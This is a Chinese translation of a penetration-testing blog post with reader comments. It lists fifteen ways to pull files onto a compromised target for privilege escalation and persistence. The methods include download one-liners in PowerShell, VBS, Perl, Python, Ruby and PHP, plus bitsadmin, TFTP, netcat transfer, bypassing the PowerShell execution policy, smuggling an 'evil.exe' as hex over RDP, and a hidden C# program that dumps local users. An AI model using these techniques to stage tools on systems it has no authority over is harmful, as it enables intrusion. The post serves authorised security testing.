下载文件的15种方法

xiaohuli的小螃蟹 2014-06-19 18:19:00

from:https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file

在我们的入侵过程中,通常会需要向目标主机传送一些文件,来达到提权,维持控制等目的。这篇blog列举了15种下载文件的方法。

当然还有许多其它的办法来上传文件,下面的列表是15个我比较喜欢使用的技巧。

PowerShell File Download

PowerShell 是一种winodws原生的脚本语言,对于熟练使用它的人来说,可以实现很多复杂的功能。

在windows 2003之中默认支持这种脚本。

下面这两条指令实现了从Internet网络下载一个文件。

$p = New-Object System.Net.WebClient
$p.DownloadFile("http://domain/file" "C:\%homepath%\file")

下面这条指令是执行一个文件

PS C:\> .\test.ps1

有的时候PowerShell的执行权限会被关闭,需要使用如下的语句打开。

C:\>powershell set-executionpolicy unrestricted

Visual Basic File Download

在1998年Visual Basic最终标准在windows上确定。下面的代码可以实现下载文件,虽然它的长度比Powershell长多了。

Set args = Wscript.Arguments
Url = "http://domain/file"
dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
dim bStrm: Set bStrm = createobject("Adodb.Stream")
xHttp.Open "GET", Url, False
xHttp.Send
with bStrm
    .type = 1 '
    .open
    .write xHttp.responseBody
    .savetofile " C:\%homepath%\file", 2 '
end with

在windows中Cscript指令可以允许你执行VBS脚本文件或者对script脚本做一些设置。在windows 7中这个指令并不是必须要用到。 但是在windows XP中需要使用这条指令,如下所示。

C:>cscript test.vbs

以下四种语言都不是系统原生脚本,但是如果你的目标机器安装了这些语言,你就可以使用他们来下载文件。

Perl File Download

Perl是一门很吊的语言,使用它基本可以实现任何事情,用它实现文件下载也很简单。

1
2
3
#!/usr/bin/perl
use LWP::Simple;
getstore("http://domain/file", "file");

执行脚本文件是这样

root@kali:~# perl test.pl

Python File Download

Python也是很受欢迎的主流脚本语言,代码清晰且简洁。

1
2
3
4
5
6
#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()

执行脚本文件是这样

root@kali:~# python test.py

Ruby File Download

Ruby是一个面对对象的语言,Metasploit框架就是用它来实现的,当然他也可以实现像下载文件这样的小任务。

1
2
3
4
5
6
7
8
#!/usr/bin/ruby
require 'net/http'
Net::HTTP.start("www.domain.com") { |http|
r = http.get("/file")
open("save_location", "wb") { |file|
file.write(r.body)
}
}

执行脚本文件是这样

root@kali:~# ruby test.rb

PHP File Download

PHP作为一种服务端脚本,也可以实现下载文件这种功能。

<?php
        $data = @file("http://example.com/file");
        $lf = "local_file";
        $fh = fopen($lf, 'w');
        fwrite($fh, $data[0]);
        fclose($fh);
?>

执行脚本文件是这样

root@kali:~# php test.php

下面的上传文件的方法,可能需要更多得步骤,但是有些情况下却可以绕过去多限制。

FTP File Download

一般情况下攻击者使用FTP上传文件需要很多交互的步骤,下面这个 bash脚本,考虑到了交互的情况,可以直接执行并不会产生交互动作。

ftp 127.0.0.1
username
password
get file
exit

TFTP File Download

在Windows Vista以及以后的版本中默认有FTP,可以使用以下命令运行:

tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

Bitsadmin File Download

Bitsadmin是Windows命令行工具,用户可以使用它来创建下载或上传的任务。

bitsadmin /transfer n http://domain/file c:\%homepath%\file

Wget File Download

Wget是Linux和Windows下的一个工具,允许非交互下载。

wget http://example.com/file

Netcat File Download

Netcat在linux上的实例:

攻击者的电脑上输入:

cat file | nc -l 1234

这个命令会将file的内容输出到本地的1234端口中,然后不论谁连接此端口,file的内容将会发送到连接过来的IP。

目标电脑上的命令:

nc host_ip 1234 > file

这条命令将连接攻击者的电脑,接受file内容保存。

Windows Share File Download

Windows shares可以加载一个驱动器,然后用命令来复制文件。

加载远程驱动:

 net use x: \\127.0.0.1\share /user:example.com\userID myPassword

Notepad Dialog Box File Download

如果你有权限接入一台(远程连接或者物理机)电脑,但是你用户权限不允许打开浏览器,这种方式可以让你快速的从一个URL或者UNC路径当中下载文件。

1.打开notepad 2.点击file - open

在File Name当中输入完整的URL:

Notepad将会获取URL的内容展现出来。

Exe to Txt, and Txt to Exe with PowerShell and Nishang

http://code.google.com/p/nishang/downloads/list

当需要把一个exe文件放到目标计算机上时,这可能是我最喜欢的工具,Nishang使用PowerShell允许你吧一个exe转换成hex,然后吧hex再转换成原来的exe文件。

把exe转成hex文件输入:

PS > .\ExetoText.ps1 evil.exe evil.txt

打开evil.txt文件,复制内容,然后通过RDP的剪贴板复制进目标计算机。

把hex文件还原成exe文件输入:

PS > .\TexttoExe.ps1 evil.text evil.exe

Csc.exe to Compile Source from a File

C的编译器(CSC)是包含在在Windows微软.NET安装中的命令行编译器。

这个可执行文件的默认位置是以下情况:

C:\Windows\Microsoft.NET\Framework\version

使用下面的示例代码,编译后的可执行文件将使用的cmd.exe来查询本地用户,然后将结果写入一个在C:\Temp\users.txt中。可以修改其中的代码,达到自己想要的目的,然后编译成exe文件。

public class Evil
{
   public static void Main()
   {
      System.Diagnostics.Process process = new System.Diagnostics.Process();
      System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
      startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
      startInfo.FileName = "cmd.exe";
      startInfo.Arguments = "/C net users > C:\\Temp\\users.txt";
      process.StartInfo = startInfo;
      process.Start();
   }
}

代码编译命令:

csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs

Wrap up

希望这篇blog对你有所帮助。

评论

J

juuxdd 2014-06-20 08:30:19

学习了!

路人甲 2014-06-20 08:36:34

到底你说的是上传还是下载啊,欺负我没文化。。。

路人甲 2014-06-20 10:01:07

这个,要是把每一种脚本语言都写出来,不止50种了吧?

园长 2014-06-20 13:52:51

不错,收集了这么多代码也不容易。

索马里的海贼 2014-06-20 19:21:31

把exe转成hex文件输入:
PS > .\ExetoText.ps1 evil.exe evil.txt
打开evil.txt文件,复制内容,然后通过RDP的剪贴板复制进目标计算机。
把hex文件还原成exe文件输入:
PS > .\TexttoExe.ps1 evil.text evil.exe
这个略扯。。。。不是说exe转hex。。。而是弄到目标上的方法

寂寞的瘦子 2014-06-21 03:21:31

以下四种语言都不是系统原生脚本,但是如果你的目标机器安装了这些语言...翻译成安装了这些语言不合适吧...

B

Bloodwolf 2014-06-21 09:49:44

没写文件的权限,只有个空shell,再上传?都是白扯

带馅儿馒头 2014-06-21 11:46:18

支持

踩花大盗 2014-06-23 17:38:11

上传到服务器和从服务器下载是不同的啊,他说的是从服务器下载。比如我入侵了一个别人的服务器,但我没有上传的权限,那或许可以利用服务器的下载来达到同样的效果。

S

SinCoder 2014-06-24 16:41:47

php 不应该是更简单的 file_get_contents('http://xx.com/1.exe');

路人甲 2014-06-25 11:03:06

sh呢...Linux自带的

路人甲 2014-06-28 10:37:20

wget 命令

Z

zzR 2014-07-04 17:12:47

get

Z

z7y 2014-09-06 23:01:08

还有cscript

M

My5t3ry 2014-09-08 00:34:09


路人甲 2015-01-16 00:38:56

大家好,我是新手,请多多指教,

phith0n 2015-03-25 18:53:32

#!/usr/bin/python
import urllib2
u = urllib2.urlopen('http://domain/file')
localFile = open('local_file', 'w')
localFile.write(u.read())
localFile.close()
没见过下载文件用w不用wb的啊!!!
坑死了,我说下的exe怎么执行不了,早知道不偷懒自己写一个了!!

X

xsser 2015-03-25 20:09:19

哈哈

路人甲 2015-10-25 23:07:37

notepad那种方法也需要系统里有ie的吧,不然我怀疑能否解析url

路人甲 2016-01-10 22:42:12

powershell的显示语法错误这是为什么

X

xiaohuli的小螃蟹

爱小狐狸的小螃蟹

twitter weibo github wechat

随机分类

企业安全 文章:40 篇
Python安全 文章:13 篇
APT 文章:6 篇
PHP安全 文章:45 篇
无线安全 文章:27 篇

扫码关注公众号

WeChat Offical Account QRCode

最新评论

Article_kelp

因为这里的静态目录访功能应该理解为绑定在static路径下的内置路由,你需要用s

N

Nas

师傅您好!_static_url_path那 flag在当前目录下 通过原型链污

Z

zhangy

你好,为什么我也是用windows2016和win10,但是流量是smb3,加密

K

k0uaz

foniw师傅提到的setfge当在类的字段名成是age时不会自动调用。因为获取

Yukong

🐮皮

目录